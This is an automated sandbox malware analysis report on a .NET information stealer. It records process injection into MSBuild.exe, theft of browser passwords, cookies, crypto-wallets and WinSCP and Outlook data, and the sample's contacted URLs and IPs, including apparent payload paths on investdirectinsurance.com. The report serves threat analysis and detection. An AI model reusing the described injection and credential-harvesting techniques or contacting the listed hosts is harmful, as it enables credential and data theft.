Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE

Source: C:\Windows\SysWOW64\wbem\WMIC.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 3_2_00EBC038 LdrInitializeThunk,

3_2_00EBC038

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: Ycj3d5NMhc.exe, ThemeManager.cs	Reference to suspicious API methods: Application.Current.TryFindResource((object)new ComponentResourceKey(typeof(NavigationPane), (object)"ActiveTheme"))
Source: 0.2.Ycj3d5NMhc.exe.12689ac0.2.raw.unpack, ParentProcessUtil.cs	Reference to suspicious API methods: NativeMethods.OpenProcess(PROCESS_QUERY_INFORMATION, bInheritHandle: false, (uint)id)
Source: 0.2.Ycj3d5NMhc.exe.12689ac0.2.raw.unpack, FireFoxDecryptor.cs	Reference to suspicious API methods: KernelLoadLibrary64(GeckoResourcePath + "nss3.dll")
Source: 0.2.Ycj3d5NMhc.exe.12689ac0.2.raw.unpack, FireFoxDecryptor.cs	Reference to suspicious API methods: HeavensGate.GetProcAddress64(NSS3, "NSS_Init")
Source: 0.2.Ycj3d5NMhc.exe.12689ac0.2.raw.unpack, FireFoxDecryptor.cs	Reference to suspicious API methods: HeavensGate.GetProcAddress64(num, "VirtualProtectEx")
Source: 0.2.Ycj3d5NMhc.exe.12689ac0.2.raw.unpack, FireFoxDecryptor.cs	Reference to suspicious API methods: HeavensGate.GetProcAddress64(num, "WriteProcessMemory")
Source: 0.2.Ycj3d5NMhc.exe.12689ac0.2.raw.unpack, HeavensGateProcessor.cs	Reference to suspicious API methods: NativeMethods.ReadProcessMemory(lpTargetHandle, (uint)processParameters, intPtr, (uint)Marshal.SizeOf(typeof(ulong)), ref lpNumberOfBytesRead)

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 430000	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 432000	Jump to behavior
Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 983008	Jump to behavior

Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe "wmic" csproduct get UUID			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId

Jump to behavior

Source: C:\Users\user\Desktop\Ycj3d5NMhc.exe	Queries volume information: C:\Users\user\Desktop\Ycj3d5NMhc.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Ycj3d5NMhc.exe, 00000000.00000002.1490044573.0000000012689000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ElectrumLTC_config_file
Source: Ycj3d5NMhc.exe, 00000000.00000002.1490044573.0000000012689000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ElectronCash_config_file
Source: Ycj3d5NMhc.exe, 00000000.00000002.1490044573.0000000012689000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Jaxx LibertyAaiaifbiceejhhkfbjdgonjgljkpcdhch
Source: Ycj3d5NMhc.exe, 00000000.00000002.1490044573.0000000012689000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ElectrumLTC_config_file
Source: Ycj3d5NMhc.exe, 00000000.00000002.1490044573.0000000012689000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Exodus_directory
Source: Ycj3d5NMhc.exe, 00000000.00000002.1490044573.0000000012689000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum_directory
Source: Ycj3d5NMhc.exe, 00000000.00000002.1490044573.0000000012689000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration\Security			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Yara match	File source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Ycj3d5NMhc.exe.12689ac0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Ycj3d5NMhc.exe.12689ac0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1523018849.000000000298A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1521055612.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1490044573.0000000012689000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Ycj3d5NMhc.exe PID: 2884, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 5992, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	311 Process Injection	1 Masquerading	1 OS Credential Dumping	111 Security Software Discovery	Remote Services	1 Email Collection	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	1 Credentials in Registry	1 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	41 Virtualization/Sandbox Evasion	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	2 Data from Local System	2 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	311 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	13 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	133 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Ycj3d5NMhc.exe	24%	ReversingLabs	Win32.Dropper.Generic
Ycj3d5NMhc.exe	9%	Virustotal		Browse

Source	Detection	Scanner	Link
bg.microsoft.map.fastly.net	0%	Virustotal	Browse
ipinfo.io	0%	Virustotal	Browse
fp2e7a.wpc.phicdn.net	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bd4	0%	Avira URL Cloud	safe
https://ipinfo.io/missingauth	0%	Avira URL Cloud	safe
https://investdirectinsurance.com/assuence/litesolidCha/Zopi.bd	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bdP	0%	Avira URL Cloud	safe
https://ipinfo.io/missingauth	0%	Virustotal		Browse
https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bdj	0%	Avira URL Cloud	safe
https://ipinfo.io/json	0%	Avira URL Cloud	safe
https://investdirectinsurance.com/assuence/litesolidCha/Zopi.bd	1%	Virustotal		Browse
https://discord.com/api/v9/users/	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Virustotal		Browse
https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bd	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
https://investdirectinsurance.com/	0%	Avira URL Cloud	safe
https://discord.com/api/v9/users/	0%	Virustotal		Browse
https://ipinfo.io	0%	Avira URL Cloud	safe
https://investdirectinsurance.com/m	0%	Avira URL Cloud	safe
https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bd	1%	Virustotal		Browse
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Virustotal		Browse
https://investdirectinsurance.com/	1%	Virustotal		Browse
https://ipinfo.io	0%	Virustotal		Browse
https://ipinfo.io/json	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bg.microsoft.map.fastly.net	199.232.214.172	true	false	0%, Virustotal, Browse	unknown
ipinfo.io	34.117.59.81	true	true	0%, Virustotal, Browse	unknown
investdirectinsurance.com	104.21.65.79	true	false		unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://investdirectinsurance.com/assuence/litesolidCha/Zopi.bd	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ipinfo.io/json	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bd	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	MSBuild.exe, 00000003.00000002.1525299232.0000000003BDC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1525299232.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/chrome_newtab	MSBuild.exe, 00000003.00000002.1525299232.0000000003BDC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1525299232.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ipinfo.io/missingauth	MSBuild.exe, 00000003.00000002.1523018849.000000000298A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1523018849.0000000002986000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1523018849.0000000002AA9000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	MSBuild.exe, 00000003.00000002.1525299232.0000000003BDC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1525299232.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bd4	Ycj3d5NMhc.exe, 00000000.00000002.1487067677.0000000000857000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	MSBuild.exe, 00000003.00000002.1525299232.0000000003BDC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1525299232.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bdP	Ycj3d5NMhc.exe, 00000000.00000002.1487067677.0000000000857000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	MSBuild.exe, 00000003.00000002.1525299232.0000000003BDC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1525299232.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bdj	Ycj3d5NMhc.exe, 00000000.00000002.1487067677.0000000000857000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://discord.com/api/v9/users/	Ycj3d5NMhc.exe, 00000000.00000002.1490044573.0000000012689000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1523018849.000000000298A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1523018849.0000000002BBA000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1521055612.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	MSBuild.exe, 00000003.00000002.1525299232.0000000003BDC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1525299232.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	MSBuild.exe, 00000003.00000002.1525299232.0000000003BDC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1525299232.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://investdirectinsurance.com/	Ycj3d5NMhc.exe, 00000000.00000002.1487067677.00000000008A7000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	MSBuild.exe, 00000003.00000002.1525299232.0000000003BDC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1525299232.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	MSBuild.exe, 00000003.00000002.1523018849.0000000002941000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	MSBuild.exe, 00000003.00000002.1525299232.0000000003BDC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1525299232.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ipinfo.io	MSBuild.exe, 00000003.00000002.1523018849.0000000002941000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://investdirectinsurance.com/m	Ycj3d5NMhc.exe, 00000000.00000002.1490876841.000000001B618000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
79.110.49.176	unknown	Germany	57287	OTAVANET-ASCZ	false
34.117.59.81	ipinfo.io	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	true
104.21.65.79	investdirectinsurance.com	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1483417
Start date and time:	2024-07-27 11:36:13 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 49s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Ycj3d5NMhc.exe renamed because original name is a hash value
Original Sample Name:	c269ec6cc10cfa210817133e43becae40004a1ddb2220646cddf8a3165bf4269.exe
Detection:	MAL
Classification:	mal96.spyw.evad.winEXE@7/5@2/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 188 Number of non-executed functions: 12
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.85.23.86, 199.232.214.172, 192.229.221.95, 52.165.164.15, 20.242.39.171
Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
05:37:21	API Interceptor	20x Sleep call for process: MSBuild.exe modified
05:37:22	API Interceptor	1x Sleep call for process: WMIC.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
79.110.49.176	pandora.mpsl	Get hash	malicious	Mirai	Browse
34.117.59.81	mek_n_bat.bat	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	QMe7JpPtde.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	z30PO1028930.exe	Get hash	malicious	AsyncRAT, StormKitty, VenomRAT	Browse	ipinfo.io/ip
	SecuriteInfo.com.Win32.KeyloggerX-gen.20370.1036.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/ip
	SecuriteInfo.com.Win32.KeyloggerX-gen.20370.1036.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/ip
	IP-Grabber.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/ip
	BadUsb.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/ip
	ZmYfQBiw.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/
	jmdCh1Z3.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/
	wAFWKlU1.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/
104.21.65.79	SWIFT.exe	Get hash	malicious	Lokibot	Browse
104.21.65.79	SecuriteInfo.com.W32.Lokibot.N.gen.Eldorado.28246.8151.exe	Get hash	malicious	Lokibot	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ipinfo.io	engine.ps1	Get hash	malicious	Unknown	Browse	34.117.59.81
	invoker.ps1	Get hash	malicious	Unknown	Browse	34.117.59.81
	tgmes.ps1	Get hash	malicious	Unknown	Browse	34.117.59.81
	x.ps1	Get hash	malicious	Unknown	Browse	34.117.59.81
	invoker.ps1	Get hash	malicious	Unknown	Browse	34.117.59.81
	locker.ps1	Get hash	malicious	TrojanRansom	Browse	34.117.59.81
	mek_n_bat.bat	Get hash	malicious	Unknown	Browse	34.117.59.81
	zx.ps1	Get hash	malicious	Unknown	Browse	34.117.59.81
	QMe7JpPtde.exe	Get hash	malicious	Unknown	Browse	34.117.59.81
	file.exe	Get hash	malicious	Unknown	Browse	34.117.59.81
fp2e7a.wpc.phicdn.net	QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	192.229.221.95
	https://azadengg.com/MTQwOTk4NzcwMg==sfmaxWjJWdUxYQm5lQzA0TXpVMU1EZ3dNMmxtZUdOb1lYWmxlbkpwYzNoaGFYSmliM0p1TG1OdmJRPT0=&c=E,1,LZxP3HHb1f9qSYvI9qirqXkUUBAc_Lly3K7xLwNdfYOBECyaKUoAd-t3gcHqWT79cExKeBU56i8wGFRIGcXn5xtHq6aoS1GJuvxV76lYjLuWHw,,&typo=1	Get hash	malicious	Unknown	Browse	192.229.221.95
	x.ps1	Get hash	malicious	Unknown	Browse	192.229.221.95
	invoker.ps1	Get hash	malicious	Unknown	Browse	192.229.221.95
	http://investors.spotify.com.th.wuush.us.kg/	Get hash	malicious	Unknown	Browse	192.229.221.95
	http://investors.spotify.com.id1.wuush.us.kg/	Get hash	malicious	Unknown	Browse	192.229.221.95
	http://investors.spotify.com.sg2.wuush.us.kg/	Get hash	malicious	Unknown	Browse	192.229.221.95
	http://cache.netflix.com.sg3.wuush.us.kg/	Get hash	malicious	Unknown	Browse	192.229.221.95
	http://apple.vn377.com/	Get hash	malicious	Unknown	Browse	192.229.221.95
	http://apple.dogwog.com/	Get hash	malicious	Unknown	Browse	192.229.221.95
bg.microsoft.map.fastly.net	oz9Blof9tN.msi	Get hash	malicious	CobaltStrike	Browse	199.232.214.172
	QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	199.232.210.172
	invoker.ps1	Get hash	malicious	Unknown	Browse	199.232.210.172
	http://investors.spotify.com.th.wuush.us.kg/	Get hash	malicious	Unknown	Browse	199.232.214.172
	http://cache.netflix.com.sg3.wuush.us.kg/	Get hash	malicious	Unknown	Browse	199.232.210.172
	http://apple.vn377.com/	Get hash	malicious	Unknown	Browse	199.232.214.172
	http://apple.dogwog.com/	Get hash	malicious	Unknown	Browse	199.232.210.172
